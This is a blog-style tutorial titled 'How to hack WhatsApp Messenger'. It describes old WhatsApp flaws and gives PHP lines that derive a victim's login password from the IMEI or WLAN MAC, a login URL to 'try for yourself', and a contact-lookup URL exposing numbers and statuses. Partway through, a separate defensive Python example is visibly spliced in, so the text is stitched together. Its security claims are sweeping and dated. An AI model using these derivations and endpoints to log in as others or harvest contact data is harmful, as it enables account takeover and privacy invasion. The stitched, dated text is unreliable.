HOW TO HACK WHATS APP MESSENGER

Desktop IMs have long been our favorite mode of communication, but over time their significance has definitely come down.
With smartphones taking up a large part of our daily life, IM services like WhatsApp, iMessage, BBM, etc. have emerged and are exchanging more messages every second. WhatsApp delivers more than 1 billion messages per day, and yet it is the most insecure way of communicating.

As per a recent security analysis, WhatsApp is a totally insecure way of communicating with friends.

WhatsApp Encryption

You will be surprised to know that until August 2012, messages sent through the WhatsApp service were not encrypted in any way; everything was sent in plaintext. That means that if you were using WhatsApp on public Wi-Fi, everything could be captured by anyone else sniffing on the wireless network. The latest WhatsApp uses encryption, but this new encryption is broken, and the phone number is still sent out in plaintext.
The local storage isn't any different; you can check out the WhatsApp Database Encryption Project Report.

WhatsApp API & Reverse Engineering

If you know XMPP, the same protocol used by Facebook, GTalk, and several others, you can try your hand at WhatsAPI, an API for WhatsApp messenger.
WhatsApp uses a customized XMPP server with proprietary extensions, named internally as FunXMPP.

1. WhatsApp Authentication / Login Mechanism

Just like any other XMPP service, WhatsApp uses a Jabber ID and password to log in. The password is hashed, stored on the servers upon account creation, and used transparently every time the client connects to the server.

It's an incredibly horrible implementation. As a researcher found out, the username is the user's phone number, which an attacker probably already knows.
On Android, the password is an MD5 hash of the reversed IMEI number:
$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash
On iOS, the password is generated from the device's WLAN MAC address:
$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice
Both the IMEI and the MAC address are easily retrievable from a device if you have physical access to it. The MAC address is much easier to capture, as you can sniff it on the wireless network to which the iOS device is connected.
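Why this design fails, as an added example (not code from the original post or from WhatsApp): it reproduces the two derivations above in Python, puts an upper bound on their entropy, and contrasts them with a server-issued random secret. The functions `issue_secret` and `verify_secret` are hypothetical names for an assumed hardened design; the IMEI and MAC values are the post's own examples.

```python
import hashlib
import hmac
import math
import secrets

def android_password(imei):
    """Legacy scheme from the post: MD5 of the reversed IMEI."""
    return hashlib.md5(imei[::-1].encode("ascii")).hexdigest()

def ios_password(wlan_mac):
    """Legacy scheme from the post: MD5 of the WLAN MAC concatenated with itself."""
    return hashlib.md5((wlan_mac + wlan_mac).encode("ascii")).hexdigest()

# Upper bounds on entropy. An IMEI has 14 free decimal digits plus a
# Luhn check digit; a MAC address is 48 bits. Both are identifiers the
# device exposes, not secrets, so the real unpredictability is lower still.
IMEI_MAX_BITS = math.log2(10 ** 14)   # about 46.5 bits
MAC_MAX_BITS = math.log2(2 ** 48)     # 48 bits

def issue_secret():
    """Hardened alternative (assumed design): the server issues a random
    256-bit secret at registration and stores only its SHA-256 digest."""
    secret = secrets.token_hex(32)
    stored = hashlib.sha256(secret.encode("ascii")).hexdigest()
    return secret, stored

def verify_secret(presented, stored_digest):
    """Constant-time comparison of the presented secret against the stored digest."""
    digest = hashlib.sha256(presented.encode("ascii")).hexdigest()
    return hmac.compare_digest(digest, stored_digest)

if __name__ == "__main__":
    imei = "112222223333334"        # example IMEI from the post
    mac = "AA:BB:CC:DD:EE:FF"       # example WLAN MAC from the post
    # The derived password never changes for a given device: it cannot be
    # rotated after exposure, and reinstalling the app yields the same value.
    print("android:", android_password(imei))
    print("ios:    ", ios_password(mac))
    print("IMEI upper bound: %.1f bits, MAC upper bound: %.1f bits"
          % (IMEI_MAX_BITS, MAC_MAX_BITS))
    secret, stored = issue_secret()
    print("random secret verifies:", verify_secret(secret, stored))
```

A random per-account secret can be revoked and reissued; a value derived from hardware identifiers cannot.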
The JID is a concatenation of your country code and mobile number.
Initial login uses Digest Access Authentication. You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the user's phone number (without the country calling code)
$password = see above; for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei))
The response you would receive would be in XML, containing messages designated for your phone.

2. Text Message communication

Messages are basically sent as TCP packets, following WhatsApp’s own format (unlike what’s defined in XMPP RFCs).
Photos, videos and audio files shared with WhatsApp contacts are HTTP-uploaded to a server before being sent to the recipient(s); the message body carries the generated HTTP link along with a Base64 thumbnail of the media file (if applicable).

WhatsApp Privacy Leak

WhatsApp shares your contacts with the server; we all know that. But the way it is done is ridiculously insecure. It basically sends contact information as:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
Key “P” is the user's phone number, key “T” seems to be the uptime(?), and key “S” is the user's status message. Not sure about “JID” and “NP” yet – if you have a smart guess, let me know. All this information is public.
